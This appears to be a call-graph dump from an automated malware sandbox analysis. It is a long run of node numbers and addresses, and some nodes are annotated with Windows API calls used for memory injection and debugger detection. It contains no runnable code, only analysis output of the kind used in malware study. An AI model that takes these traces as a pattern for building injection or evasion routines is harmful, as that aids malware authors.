28582->28583 28586 2cc34d1 28583->28586 28584 2cc213f 28585 2cc216b 28584->28585 28590 2cc2197 28585->28590 28588 2cc3534 28586->28588 28587 2cb89d0 4 API calls 28587->28590 28589 2cb89d0 4 API calls 28588->28589 28592 2cc354d 28589->28592 28590->28587 28591 2cc21e7 28590->28591 28597 2cc2213 28591->28597 28593 2cc3577 28592->28593 28628 2cc36eb 28592->28628 28596 2cc35a3 28593->28596 28594 2cb89d0 4 API calls 28594->28597 28595 2cc3739 28598 2cc3770 28595->28598 28599 2cc35da 28596->28599 28597->28594 28603 2cc225f 28597->28603 28600 2cb89d0 4 API calls 28598->28600 28601 2cb89d0 4 API calls 28599->28601 28602 2cc3789 28600->28602 28607 2cc35f3 28601->28607 28604 2cc37aa 28602->28604 28606 2cc22ae 28603->28606 28609 2cc37e1 28604->28609 28605 2cb89d0 4 API calls 28605->28606 28606->28605 28608 2cc22e6 28606->28608 28611 2cc3656 28607->28611 28610 2cc22f3 28608->28610 28612 2cb89d0 4 API calls 28609->28612 28614 2cc2312 28610->28614 28613 2cb89d0 4 API calls 28611->28613 28615 2cc3805 28612->28615 28619 2cc366f 28613->28619 28616 2cc232a 28614->28616 28620 2cc3859 28615->28620 28617 2cb89d0 4 API calls 28616->28617 28618 2cc2336 28617->28618 28621 2cc2356 28618->28621 28623 2cc36d2 28619->28623 28626 2cc3890 28620->28626 28622 2cc2377 28621->28622 28625 2cc2382 28622->28625 28624 2cb89d0 4 API calls 28623->28624 28624->28628 28629 2cc23ae 28625->28629 28627 2cb89d0 4 API calls 28626->28627 28630 2cc38b4 28627->28630 28628->28595 28631 2cc23b9 28629->28631 28634 2cc38ed 28630->28634 28632 2cb89d0 4 API calls 28631->28632 28633 2cc23f3 28631->28633 28632->28631 28635 2cc23fe 28633->28635 28636 2cc3924 28634->28636 28638 2cc242a 28635->28638 28637 2cb89d0 4 API calls 28636->28637 28639 2cc3930 28637->28639 28640 2cc2435 28638->28640 28642 2cc395c 28639->28642 28641 2cb89d0 4 API calls 28640->28641 28643 2cc244e 28641->28643 28644 2cc3993 28642->28644 28647 2cc249a 28643->28647 28645 2cb89d0 4 API calls 28644->28645 28646 2cc39ac 28645->28646 28650 2cc39cd 28646->28650 28648 2cc24c6 28647->28648 28649 2cc24d1 28648->28649 28652 2cc24de 28649->28652 28653 2cc3a04 28650->28653 28651 2cb89d0 4 API calls 28651->28652 28652->28651 28655 2cc2516 28652->28655 28654 2cb89d0 4 API calls 28653->28654 28663 2cc3a28 28654->28663 28656 2cc2542 28655->28656 28658 2cc254d 28656->28658 28657 2cc5530 28664 2cc555c 28657->28664 28660 2cc255a 28658->28660 28659 2cc3a3d 28659->28663 28661 2cb89d0 4 API calls 28660->28661 28662 2cc2566 28661->28662 28665 2cc259b 28662->28665 28663->28657 28663->28659 28671 2cc3aae 28663->28671 28666 2cc5593 28664->28666 28670 2cc25d2 28665->28670 28667 2cb89d0 4 API calls 28666->28667 28668 2cc55ac 28667->28668 28669 2cc55cd 28668->28669 28676 2cc5604 28669->28676 28673 2cc25ea 28670->28673 28674 2cb89d0 4 API calls 28671->28674 28672 2cb89d0 4 API calls 28672->28673 28673->28672 28675 2cc2617 28673->28675 28681 2cc3b2a 28674->28681 28677 2cc2622 28675->28677 28678 2cb89d0 4 API calls 28676->28678 28680 2cc264e 28677->28680 28679 2cc5628 28678->28679 28686 2cc5654 28679->28686 28684 2cc2666 28680->28684 28683 2cb89d0 4 API calls 28681->28683 28682 2cb89d0 4 API calls 28682->28684 28690 2cc3ba6 28683->28690 28684->28682 28685 2cc2688 28684->28685 28689 2cc269b 28685->28689 28687 2cb89d0 4 API calls 28686->28687 28688 2cc56a4 28687->28688 28695 2cc56d0 28688->28695 28692 2cc26f3 28689->28692 28691 2cb89d0 4 API calls 28690->28691 28702 2cc3c22 28691->28702 28693 2cc270b 28692->28693 28694 2cb89d0 4 API calls 28693->28694 28698 2cc2717 28694->28698 28696 2cb89d0 4 API calls 28695->28696 28697 2cc5720 28696->28697 28707 2cc5746 28697->28707 28699 2cc2750 28698->28699 28700 2cc276f 28699->28700 28701 2cc277a 28700->28701 28704 2cc2787 28701->28704 28703 2cb89d0 4 API calls 28702->28703 28713 2cc3c9e 28703->28713 28705 2cb89d0 4 API calls 28704->28705 28706 2cc2793 28705->28706 28709 2cc27c4 28706->28709 28708 2cb89d0 4 API calls 28707->28708 28716 2cc57c2 28708->28716 28710 2cc27f0 28709->28710 28711 2cc27fb 28710->28711 28714 2cc2808 28711->28714 28712 2cb89d0 4 API calls 28712->28714 28715 2cb89d0 4 API calls 28713->28715 28714->28712 28718 2cc2840 28714->28718 28720 2cc3d85 28715->28720 28717 2cb89d0 4 API calls 28716->28717 28722 2cc583e 28717->28722 28746 2cc286c 28718->28746 28719 2cc2877 28719->28747 28720->28105 28721 2cc28b5 28724 2cc290d 28721->28724 28723 2cb89d0 4 API calls 28722->28723 28729 2cc58e6 28723->28729 28725 2cc2925 28724->28725 28726 2cb89d0 4 API calls 28725->28726 28727 2cc2931 28726->28727 28728 2cc296a 28727->28728 28730 2cc2989 28728->28730 28731 2cb89d0 4 API calls 28729->28731 28732 2cc2994 28730->28732 28736 2cc5962 28731->28736 28733 2cc29a1 28732->28733 28734 2cb89d0 4 API calls 28733->28734 28735 2cc29ad 28734->28735 28738 2cc29ee 28735->28738 28737 2cb89d0 4 API calls 28736->28737 28743 2cc59de 28737->28743 28739 2cc2a06 28738->28739 28740 2cc2a25 28739->28740 28742 2cc2a30 28740->28742 28741 2cb89d0 4 API calls 28741->28742 28742->28741 28745 2cc2a6a 28742->28745 28744 2cb89d0 4 API calls 28743->28744 28749 2cc5a5a 28744->28749 28745->28746 28746->28719 28747->28362 28747->28524 28747->28569 28747->28584 28747->28721 28748 2cb89d0 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28747->28748 29411 2cbe4b8 NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28747->29411 28748->28747 28750 2cb89d0 4 API calls 28749->28750 28751 2cc5b07 28750->28751 28752 2cb89d0 4 API calls 28751->28752 28753 2cc5b83 28752->28753 28754 2cb89d0 4 API calls 28753->28754 28755 2cc5bff 28754->28755 28756 2cb89d0 4 API calls 28755->28756 28757 2cc5c7b 28756->28757 28758 2cb89d0 4 API calls 28757->28758 28759 2cc5cf7 28758->28759 28760 2cb89d0 4 API calls 28759->28760 28761 2cc5d73 28760->28761 28762 2cc5dd3 28761->28762 29102 2cc6ff3 28761->29102 28763 2cc5df4 28762->28763 28764 2cc5dff 28763->28764 28766 2cc5e0c 28764->28766 28765 2cb89d0 4 API calls 28773 2cc75e4 28765->28773 28767 2cc5e2b 28766->28767 28768 2cc5e36 28767->28768 28769 2cc5e43 28768->28769 28770 2cb89d0 4 API calls 28769->28770 28771 2cc5e4f 28770->28771 28772 2cc5e70 28771->28772 28774 2cc5e7b 28772->28774 28775 2cb89d0 4 API calls 28773->28775 28776 2cc5e88 28774->28776 28782 2cc7660 28775->28782 28777 2cc5ea7 28776->28777 28778 2cc5eb2 28777->28778 28779 2cc5ebf 28778->28779 28780 2cb89d0 4 API calls 28779->28780 28781 2cc5ecb 28780->28781 28784 2cc5eec 28781->28784 28783 2cb89d0 4 API calls 28782->28783 28787 2cc76dc 28783->28787 28785 2cb89d0 4 API calls 28784->28785 28786 2cc5f47 28785->28786 28789 2cc5f68 28786->28789 28788 2cb89d0 4 API calls 28787->28788 28792 2cc7758 28788->28792 28790 2cc5fa0 28789->28790 28791 2cc5fd7 28790->28791 28795 2cb89d0 4 API calls 28791->28795 28793 2cb89d0 4 API calls 28792->28793 28794 2cc77d4 28793->28794 28800 2cc8318 28794->28800 28801 2cc77e9 28794->28801 28796 2cc5ffb 28795->28796 28797 2cc6034 28796->28797 28798 2cc606b 28797->28798 28799 2cb89d0 4 API calls 28798->28799 28802 2cc6077 28799->28802 28803 2cb89d0 4 API calls 28800->28803 28804 2cb89d0 4 API calls 28801->28804 28805 2cc60a3 28802->28805 28809 2cc8394 28803->28809 28808 2cc7865 28804->28808 28806 2cc60da 28805->28806 28807 2cb89d0 4 API calls 28806->28807 28812 2cc60f3 28807->28812 28811 2cb89d0 4 API calls 28808->28811 28810 2cb89d0 4 API calls 28809->28810 28816 2cc8410 28810->28816 28815 2cc78e1 28811->28815 28813 2cc6156 28812->28813 28814 2cb89d0 4 API calls 28813->28814 28820 2cc616f 28814->28820 28817 2cb89d0 4 API calls 28815->28817 28818 2cb89d0 4 API calls 28816->28818 28819 2cc795d 28817->28819 28822 2cc848c 28818->28822 29413 2cb85bc GetModuleHandleA GetProcAddress 28819->29413 28825 2cc61ec 28820->28825 28823 2cb89d0 4 API calls 28822->28823 28824 2cc8508 28823->28824 28826 2cc851d 28824->28826 28834 2cc93a1 28824->28834 28827 2cb89d0 4 API calls 28825->28827 28831 2cc853e 28826->28831 28829 2cc623c 28827->28829 28828 2cc7986 28830 2cb89d0 4 API calls 28828->28830 28832 2cc6268 28829->28832 28839 2cc7a02 28830->28839 28833 2cc8575 28831->28833 28836 2cc629f 28832->28836 28837 2cb89d0 4 API calls 28833->28837 28835 2cb89d0 4 API calls 28834->28835 28847 2cc941d 28835->28847 28838 2cb89d0 4 API calls 28836->28838 28842 2cc8599 28837->28842 28840 2cc62b8 28838->28840 28841 2cb89d0 4 API calls 28839->28841 28843 2cc62d9 28840->28843 28852 2cc7a7e 28841->28852 28844 2cc85d2 28842->28844 28845 2cc6310 28843->28845 28846 2cc8609 28844->28846 28850 2cb89d0 4 API calls 28845->28850 28848 2cb89d0 4 API calls 28846->28848 28849 2cb89d0 4 API calls 28847->28849 28851 2cc8615 28848->28851 28859 2cc9499 28849->28859 28854 2cc6334 28850->28854 28855 2cc8641 28851->28855 28853 2cb89d0 4 API calls 28852->28853 28866 2cc7afa 28853->28866 28856 2cc636d 28854->28856 28858 2cc8678 28855->28858 28857 2cc63a4 28856->28857 28862 2cb89d0 4 API calls 28857->28862 28860 2cb89d0 4 API calls 28858->28860 28861 2cb89d0 4 API calls 28859->28861 28863 2cc8691 28860->28863 28878 2cc9515 28861->28878 28864 2cc63b0 28862->28864 28865 2cc86bd 28863->28865 28867 2cc63dc 28864->28867 28869 2cc86e0 28865->28869 28868 2cb89d0 4 API calls 28866->28868 28871 2cc6413 28867->28871 28882 2cc7b9d 28868->28882 28870 2cc876e 28869->28870 28873 2cc86f2 28869->28873 28877 2cc878f 28870->28877 28872 2cb89d0 4 API calls 28871->28872 28874 2cc642c 28872->28874 28879 2cc871e 28873->28879 28881 2cc644d 28874->28881 28875 2cc9cf5 28876 2cb89d0 4 API calls 28875->28876 28891 2cc9d71 28876->28891 28885 2cc87a7 28877->28885 28878->28875 28880 2cb89d0 4 API calls 28878->28880 28883 2cc8755 28879->28883 28894 2cc95bb 28880->28894 28888 2cc6484 28881->28888 28884 2cb89d0 4 API calls 28882->28884 28887 2cb89d0 4 API calls 28883->28887 28897 2cc7c19 28884->28897 28886 2cb89d0 4 API calls 28885->28886 28889 2cc87ea 28886->28889 28887->28870 28890 2cb89d0 4 API calls 28888->28890 28899 2cc8823 28889->28899 28893 2cc64a8 28890->28893 28892 2cb89d0 4 API calls 28891->28892 28903 2cc9ded 28892->28903 29412 2cb85bc GetModuleHandleA GetProcAddress 28893->29412 28895 2cb89d0 4 API calls 28894->28895 28907 2cc9637 28895->28907 28898 2cb89d0 4 API calls 28897->28898 28911 2cc7c95 28898->28911 28901 2cb89d0 4 API calls 28899->28901 28900 2cc64e6 28904 2cc651f 28900->28904 28902 2cc8866 28901->28902 28916 2cc88b9 28902->28916 28905 2cb89d0 4 API calls 28903->28905 28906 2cc6556 28904->28906 28909 2cc9e69 28905->28909 28910 2cb89d0 4 API calls 28906->28910 28908 2cb89d0 4 API calls 28907->28908 28927 2cc96b3 28908->28927 28913 2cb89d0 4 API calls 28909->28913 28912 2cc6562 28910->28912 28914 2cb89d0 4 API calls 28911->28914 28917 2cc658e 28912->28917 28915 2cc9e9c 28913->28915 28926 2cc7d30 28914->28926 28918 2cb89d0 4 API calls 28915->28918 28919 2cb89d0 4 API calls 28916->28919 28922 2cc65c5 28917->28922 28921 2cc9ecf 28918->28921 28920 2cc8914 28919->28920 28932 2cc8935 28920->28932 28924 2cb89d0 4 API calls 28921->28924 28923 2cb89d0 4 API calls 28922->28923 28925 2cc65de 28923->28925 28928 2cc9f02 28924->28928 28930 2cc65ff 28925->28930 28929 2cb89d0 4 API calls 28926->28929 28933 2cb89d0 4 API calls 28927->28933 28931 2cb89d0 4 API calls 28928->28931 28938 2cc7dac 28929->28938 28935 2cc6636 28930->28935 28940 2cc9f35 28931->28940 28934 2cb89d0 4 API calls 28932->28934 28941 2cc978a 28933->28941 28944 2cc8990 28934->28944 28936 2cb89d0 4 API calls 28935->28936 28937 2cc665a 28936->28937 28948 2cc6686 28937->28948 28939 2cb89d0 4 API calls 28938->28939 28958 2cc7e28 28939->28958 28942 2cb89d0 4 API calls 28940->28942 28943 2cb89d0 4 API calls 28941->28943 28952 2cc9fb1 28942->28952 28954 2cc9806 28943->28954 28945 2cb89d0 4 API calls 28944->28945 28946 2cc8a0c 28945->28946 29416 2cbd164 NtAllocateVirtualMemory NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 28946->29416 28949 2cb89d0 4 API calls 28948->28949 28950 2cc66d6 28949->28950 28951 2cc66eb 28950->28951 28963 2cc6949 28950->28963 28955 2cc670c 28951->28955 28953 2cb89d0 4 API calls 28952->28953 28968 2cca02d 28953->28968 28956 2cb89d0 4 API calls 28954->28956 29034 2cc9aa9 28954->29034 28962 2cc6743 28955->28962 28972 2cc9894 28956->28972 28957 2cb89d0 4 API calls 28971 2cc9b6b 28957->28971 28960 2cb89d0 4 API calls 28958->28960 28959 2cc8a20 28961 2cb89d0 4 API calls 28959->28961 28964 2cc7ee5 28960->28964 28976 2cc8aa1 28961->28976 28967 2cb89d0 4 API calls 28962->28967 28965 2cb89d0 4 API calls 28963->28965 29414 2cb7e50 GetModuleHandleA GetProcAddress 28964->29414 28983 2cc69c5 28965->28983 28970 2cc6767 28967->28970 28969 2cb89d0 4 API calls 28968->28969 28975 2cca0a9 28969->28975 28979 2cc67a0 28970->28979 28974 2cb89d0 4 API calls 28971->28974 28973 2cb89d0 4 API calls 28972->28973 28990 2cc9910 28973->28990 28991 2cc9be7 28974->28991 28978 2cb89d0 4 API calls 28975->28978 28977 2cb89d0 4 API calls 28976->28977 28994 2cc8b1d 28977->28994 28980 2cca0dc 28978->28980 28982 2cc67d7 28979->28982 28987 2cb89d0 4 API calls 28980->28987 28981 2cc7f08 28984 2cb89d0 4 API calls 28981->28984 28985 2cb89d0 4 API calls 28982->28985 28986 2cb89d0 4 API calls 28983->28986 29003 2cc7f84 28984->29003 28988 2cc67e3 28985->28988 29004 2cc6a41 28986->29004 28989 2cca10f 28987->28989 28996 2cc680f 28988->28996 28993 2cb89d0 4 API calls 28989->28993 28995 2cb89d0 4 API calls 28990->28995 28992 2cb89d0 4 API calls 28991->28992 29011 2cc9c63 28992->29011 28999 2cca142 28993->28999 28997 2cb89d0 4 API calls 28994->28997 29017 2cc998c 28995->29017 29000 2cc6846 28996->29000 28998 2cc8b99 28997->28998 29014 2cc8bb9 28998->29014 29417 2cb8730 GetModuleHandleA GetProcAddress 28998->29417 29002 2cb89d0 4 API calls 28999->29002 29006 2cb89d0 4 API calls 29000->29006 29009 2cca175 29002->29009 29005 2cb89d0 4 API calls 29003->29005 29007 2cb89d0 4 API calls 29004->29007 29021 2cc8000 29005->29021 29008 2cc685f 29006->29008 29023 2cc6abd 29007->29023 29012 2cc6880 29008->29012 29010 2cb89d0 4 API calls 29009->29010 29027 2cca1a8 29010->29027 29013 2cb89d0 4 API calls 29011->29013 29020 2cc68b7 29012->29020 29015 2cc9cdf 29013->29015 29016 2cb89d0 4 API calls 29014->29016 29255 2cb8d70 29015->29255 29029 2cc8c35 29016->29029 29018 2cb89d0 4 API calls 29017->29018 29032 2cc9a2d 29018->29032 29022 2cc68cf 29020->29022 29024 2cb89d0 4 API calls 29021->29024 29025 2cb89d0 4 API calls 29022->29025 29026 2cb89d0 4 API calls 29023->29026 29035 2cc807c 29024->29035 29031 2cc68db 29025->29031 29036 2cc6b39 29026->29036 29028 2cb89d0 4 API calls 29027->29028 29042 2cca224 29028->29042 29030 2cb89d0 4 API calls 29029->29030 29044 2cc8cb1 29030->29044 29031->28963 29033 2cb89d0 4 API calls 29032->29033 29033->29034 29034->28957 29037 2cb89d0 4 API calls 29035->29037 29038 2cb89d0 4 API calls 29036->29038 29039 2cc80f8 29037->29039 29048 2cc6bb5 29038->29048 29415 2cbb118 NtAllocateVirtualMemory NtWriteVirtualMemory GetModuleHandleA GetProcAddress FlushInstructionCache 29039->29415 29041 2cc8109 29041->28105 29043 2cb89d0 4 API calls 29042->29043 29046 2cca2a0 29043->29046 29045 2cb89d0 4 API calls 29044->29045 29050 2cc8d2d 29045->29050 29047 2cb89d0 4 API calls 29046->29047 29051 2cca2d3 29047->29051 29049 2cb89d0 4 API calls 29048->29049 29054 2cc6c31 29049->29054 29052 2cb89d0 4 API calls 29050->29052 29053 2cb89d0 4 API calls 29051->29053 29056 2cc8db4 29052->29056 29057 2cca34f 29053->29057 29055 2cb89d0 4 API calls 29054->29055 29060 2cc6cad 29055->29060 29058 2cb89d0 4 API calls 29056->29058 29059 2cb89d0 4 API calls 29057->29059 29062 2cc8e30 29058->29062 29063 2cca3cb 29059->29063 29061 2cb89d0 4 API calls 29060->29061 29073 2cc6d48 29061->29073 29064 2cb89d0 4 API calls 29062->29064 29065 2cb89d0 4 API calls 29063->29065 29070 2cc8eac 29064->29070 29066 2cca447 29065->29066 29067 2cb89d0 4 API calls 29066->29067 29068 2cca47a 29067->29068 29069 2cb89d0 4 API calls 29068->29069 29072 2cca4ad 29069->29072 29071 2cb89d0 4 API calls 29070->29071 29078 2cc8f33 29071->29078 29074 2cb89d0 4 API calls 29072->29074 29075 2cb89d0 4 API calls 29073->29075 29076 2cca4e0 29074->29076 29080 2cc6e43 29075->29080 29077 2cb89d0 4 API calls 29076->29077 29082 2cca513 29077->29082 29079 2cb89d0 4 API calls 29078->29079 29084 2cc8faf 29079->29084 29081 2cb89d0 4 API calls 29080->29081 29088 2cc6ebf 29081->29088 29083 2cb89d0 4 API calls 29082->29083 29086 2cca58f 29083->29086 29085 2cb89d0 4 API calls 29084->29085 29091 2cc902b 29085->29091 29087 2cb89d0 4 API calls 29086->29087 29090 2cca60b 29087->29090 29089 2cb89d0 4 API calls 29088->29089 29096 2cc6f77 29089->29096 29092 2cb89d0 4 API calls 29090->29092 29093 2cb89d0 4 API calls 29091->29093 29094 2cca63e 29092->29094 29100 2cc90a7 29093->29100 29095 2cb89d0 4 API calls 29094->29095 29097 2cca671 29095->29097 29098 2cb89d0 4 API calls 29096->29098 29099 2cb89d0 4 API calls 29097->29099 29098->29102 29103 2cca6a4 29099->29103 29101 2cb89d0 4 API calls 29100->29101 29107 2cc9123 29101->29107 29102->28105 29102->28765 29104 2cb89d0 4 API calls 29103->29104 29105 2cca6d7 29104->29105 29106 2cb89d0 4 API calls 29105->29106 29109 2cca70a 29106->29109 29108 2cb89d0 4 API calls 29107->29108 29111 2cc919f 29108->29111 29110 2cb89d0 4 API calls 29109->29110 29120 2cca786 29110->29120 29112 2cb89d0 4 API calls 29111->29112 29113 2cc921b 29112->29113 29418 2cb894c 29113->29418 29115 2cc923a 29116 2cb894c 3 API calls 29115->29116 29117 2cc924e 29116->29117 29118 2cb894c 3 API calls 29117->29118 29119 2cc9262 29118->29119 29121 2cb894c 3 API calls 29119->29121 29122 2cb89d0 4 API calls 29120->29122 29123 2cc9276 29121->29123 29127 2cca802 29122->29127 29124 2cb894c 3 API calls 29123->29124 29125 2cc928a 29124->29125 29126 2cb894c 3 API calls 29125->29126 29129 2cc929e 29126->29129 29128 2cb89d0 4 API calls 29127->29128 29131 2cca87e 29128->29131 29130 2cb89d0 4 API calls 29129->29130 29133 2cc9325 29130->29133 29132 2cb89d0 4 API calls 29131->29132 29135 2cca8fa 29132->29135 29134 2cb89d0 4 API calls 29133->29134 29134->28834 29136 2cb89d0 4 API calls 29135->29136 29137 2cca976 29136->29137 29138 2cb89d0 4 API calls 29137->29138 29139 2cca985 29138->29139 29140 2cb89d0 4 API calls 29139->29140 29141 2cca994 29140->29141 29142 2cb89d0 4 API calls 29141->29142 29143 2cca9a3 29142->29143 29144 2cb89d0 4 API calls 29143->29144 29145 2cca9b2 29144->29145 29146 2cb89d0 4 API calls 29145->29146 29147 2cca9c1 29146->29147 29148 2cb89d0 4 API calls 29147->29148 29149 2cca9d0 29148->29149 29150 2cb89d0 4 API calls 29149->29150 29151 2cca9df 29150->29151 29152 2cb89d0 4 API calls 29151->29152 29153 2cca9ee 29152->29153 29154 2cb89d0 4 API calls 29153->29154 29155 2cca9fd 29154->29155 29156 2cb89d0 4 API calls 29155->29156 29157 2ccaa0c 29156->29157 29158 2cb89d0 4 API calls 29157->29158 29159 2ccaa1b 29158->29159 29160 2cb89d0 4 API calls 29159->29160 29161 2ccaa2a 29160->29161 29162 2cb89d0 4 API calls 29161->29162 29163 2ccaa39 29162->29163 29164 2cb89d0 4 API calls 29163->29164 29165 2ccaa48 29164->29165 29166 2cb89d0 4 API calls 29165->29166 29167 2ccaa57 29166->29167 29168 2cb89d0 4 API calls 29167->29168 29169 2ccaad3 29168->29169 29170 2cb89d0 4 API calls 29169->29170 29171 2ccab06 29170->29171 29172 2cb89d0 4 API calls 29171->29172 29173 2ccab39 29172->29173 29174 2cb89d0 4 API calls 29173->29174 29175 2ccab6c 29174->29175 29176 2cb89d0 4 API calls 29175->29176 29177 2ccab9f 29176->29177 29178 2cb89d0 4 API calls 29177->29178 29179 2ccabd2 29178->29179 29180 2cb89d0 4 API calls 29179->29180 29181 2ccac05 29180->29181 29182 2cb89d0 4 API calls 29181->29182 29183 2ccac38 29182->29183 29184 2cb89d0 4 API calls 29183->29184 29185 2ccacb4 29184->29185 29186 2cb89d0 4 API calls 29185->29186 29187 2ccad30 29186->29187 29188 2cb89d0 4 API calls 29187->29188 29189 2ccadac 29188->29189 29190 2cb89d0 4 API calls 29189->29190 29191 2ccaddf 29190->29191 29192 2cb89d0 4 API calls 29191->29192 29193 2ccae12 29192->29193 29194 2cb89d0 4 API calls 29193->29194 29195 2ccae45 29194->29195 29196 2cb89d0 4 API calls 29195->29196 29197 2ccae78 29196->29197 29198 2cb89d0 4 API calls 29197->29198 29199 2ccaeab 29198->29199 29200 2cb89d0 4 API calls 29199->29200 29201 2ccaede 29200->29201 29202 2cb89d0 4 API calls 29201->29202 29203 2ccaf11 29202->29203 29204 2cb89d0 4 API calls 29203->29204 29205 2ccaf44 29204->29205 29206 2cb89d0 4 API calls 29205->29206 29207 2ccaf77 29206->29207 29208 2cb89d0 4 API calls 29207->29208 29209 2ccafaa 29208->29209 29210 2cb89d0 4 API calls 29209->29210 29211 2ccafdd 29210->29211 29212 2cb89d0 4 API calls 29211->29212 29213 2ccb010 29212->29213 29214 2cb89d0 4 API calls 29213->29214 29215 2ccb043 29214->29215 29216 2cb89d0 4 API calls 29215->29216 29217 2ccb076 29216->29217 29218 2cb89d0 4 API calls 29217->29218 29219 2ccb0a9 29218->29219 29220 2cb89d0 4 API calls 29219->29220 29221 2ccb0dc 29220->29221 29222 2cb89d0 4 API calls 29221->29222 29223 2ccb10f 29222->29223 29224 2cb89d0 4 API calls 29223->29224 29225 2ccb142 29224->29225 29226 2cb89d0 4 API calls 29225->29226 29227 2ccb175 29226->29227 29422 2cb8338 29227->29422 29229 2ccb184 29230 2cb89d0 4 API calls 29229->29230 29231 2ccb200 29230->29231 29232 2cb89d0 4 API calls 29231->29232 29233 2ccb27c 29232->29233 29234 2cb89d0 4 API calls 29233->29234 29234->28137 29236 2cb88c6 29235->29236 29429 2cb8274 29236->29429 29238 2cb88f1 29433 2cb7d78 29238->29433 29240 2cb891f 29240->28109 29242 2cb89e4 29241->29242 29243 2cb81cc 2 API calls 29242->29243 29244 2cb8a1d 29243->29244 29245 2cb8274 GetProcAddress 29244->29245 29246 2cb8a36 29245->29246 29247 2cb7d78 3 API calls 29246->29247 29248 2cb8a95 29247->29248 29249 2cb8338 3 API calls 29248->29249 29250 2cb8aa4 29249->29250 29250->28114 29252 2cbf759 29251->29252 29253 2cbf786 29252->29253 29254 2cbf774 CheckRemoteDebuggerPresent 29252->29254 29253->28140 29254->29253 29256 2cb8d78 29255->29256 29257 2cb89d0 4 API calls 29256->29257 29258 2cb8dfb 29257->29258 29259 2cb89d0 4 API calls 29258->29259 29260 2cb8e54 29259->29260 29261 2cba8b7 29260->29261 29262 2cb89d0 4 API calls 29260->29262 29261->28875 29263 2cb8ec5 29262->29263 29264 2cb89d0 4 API calls 29263->29264 29265 2cb8f1e 29264->29265 29265->29261 29266 2cb89d0 4 API calls 29265->29266 29267 2cb8fa6 29266->29267 29268 2cb89d0 4 API calls 29267->29268 29269 2cb8fff 29268->29269 29270 2cb89d0 4 API calls 29269->29270 29271 2cb9084 29270->29271 29272 2cb89d0 4 API calls 29271->29272 29273 2cb90e3 29272->29273 29274 2cb89d0 4 API calls 29273->29274 29275 2cb9154 29274->29275 29276 2cb89d0 4 API calls 29275->29276 29277 2cb91c5 29276->29277 29278 2cb89d0 4 API calls 29277->29278 29279 2cb9236 29278->29279 29445 2cb8788 29279->29445 29281 2cb9273 29282 2cb92e8 29281->29282 29284 2cb89d0 4 API calls 29281->29284 29283 2cb89d0 4 API calls 29282->29283 29285 2cb9359 29283->29285 29284->29282 29286 2cb89d0 4 API calls 29285->29286 29287 2cb938c 29286->29287 29288 2cb89d0 4 API calls 29287->29288 29289 2cb93fd 29288->29289 29290 2cb89d0 4 API calls 29289->29290 29291 2cb946e 29290->29291 29292 2cb89d0 4 API calls 29291->29292 29293 2cb950b 29292->29293 29294 2cb89d0 4 API calls 29293->29294 29295 2cb957c 29294->29295 29296 2cb89d0 4 API calls 29295->29296 29297 2cb95ed 29296->29297 29297->29261 29298 2cb89d0 4 API calls 29297->29298 29299 2cb9680 29298->29299 29300 2cb89d0 4 API calls 29299->29300 29301 2cb96f1 29300->29301 29302 2cb89d0 4 API calls 29301->29302 29303 2cb9762 29302->29303 29304 2cb89d0 4 API calls 29303->29304 29305 2cb97d3 29304->29305 29306 2cb89d0 4 API calls 29305->29306 29307 2cb9844 29306->29307 29452 2cb8400 29307->29452 29309 2cb9864 29310 2cb9b7f 29309->29310 29311 2cb9878 29309->29311 29312 2cb89d0 4 API calls 29310->29312 29314 2cb9b78 29310->29314 29313 2cb89d0 4 API calls 29311->29313 29312->29314 29315 2cb98e9 29313->29315 29316 2cb89d0 4 API calls 29314->29316 29317 2cb89d0 4 API calls 29315->29317 29318 2cb9c61 29316->29318 29319 2cb995a 29317->29319 29320 2cb89d0 4 API calls 29318->29320 29321 2cb89d0 4 API calls 29319->29321 29327 2cb9cd2 29320->29327 29322 2cb99cb 29321->29322 29459 2cb8670 29322->29459 29324 2cb99df 29325 2cb99e3 29324->29325 29331 2cb9a0b 29324->29331 29466 2cb7a2c 29325->29466 29328 2cb89d0 4 API calls 29327->29328 29329 2cb9d43 29328->29329 29330 2cb7a2c 3 API calls 29329->29330 29335 2cb9d64 29330->29335 29332 2cb89d0 4 API calls 29331->29332 29333 2cb9a04 29331->29333 29332->29333 29334 2cb89d0 4 API calls 29333->29334 29337 2cb9aed 29334->29337 29335->29261 29336 2cb89d0 4 API calls 29335->29336 29341 2cb9de7 29336->29341 29338 2cb89d0 4 API calls 29337->29338 29339 2cb9b5e 29338->29339 29340 2cb7a2c 3 API calls 29339->29340 29340->29314 29342 2cb89d0 4 API calls 29341->29342 29343 2cb9e58 29342->29343 29344 2cb89d0 4 API calls 29343->29344 29345 2cb9f34 29344->29345 29346 2cb89d0 4 API calls 29345->29346 29347 2cb9fa5 29346->29347 29348 2cb89d0 4 API calls 29347->29348 29349 2cba016 29348->29349 29350 2cb7d78 3 API calls 29349->29350 29351 2cba033 29350->29351 29352 2cb89d0 4 API calls 29351->29352 29353 2cba0a4 29352->29353 29354 2cb89d0 4 API calls 29353->29354 29355 2cba115 29354->29355 29356 2cb89d0 4 API calls 29355->29356 29357 2cba186 29356->29357 29358 2cb7d78 3 API calls 29357->29358 29359 2cba1a6 29358->29359 29360 2cb89d0 4 API calls 29359->29360 29361 2cba217 29360->29361 29362 2cb89d0 4 API calls 29361->29362 29363 2cba288 29362->29363 29364 2cb89d0 4 API calls 29363->29364 29365 2cba2f9 29364->29365 29366 2cb89d0 4 API calls 29365->29366 29367 2cba39a 29366->29367 29368 2cb89d0 4 API calls 29367->29368 29369 2cba40b 29368->29369 29370 2cb89d0 4 API calls 29369->29370 29371 2cba47c 29370->29371 29372 2cb89d0 4 API calls 29371->29372 29373 2cba4ed 29372->29373 29374 2cb89d0 4 API calls 29373->29374 29375 2cba573 29374->29375 29376 2cb894c 3 API calls 29375->29376 29377 2cba587 29376->29377 29378 2cb894c 3 API calls 29377->29378 29379 2cba59b 29378->29379 29380 2cb894c 3 API calls 29379->29380 29381 2cba5af 29380->29381 29382 2cb89d0 4 API calls 29381->29382 29383 2cba620 29382->29383 29384 2cb894c 3 API calls 29383->29384 29385 2cba634 29384->29385 29386 2cb894c 3 API calls 29385->29386 29387 2cba648 29386->29387 29388 2cb894c 3 API calls 29387->29388 29389 2cba69a 29388->29389 29390 2cb894c 3 API calls 29389->29390 29391 2cba6ec 29390->29391 29392 2cb894c 3 API calls 29391->29392 29393 2cba700 29392->29393 29394 2cb894c 3 API calls 29393->29394 29395 2cba714 29394->29395 29396 2cb894c 3 API calls 29395->29396 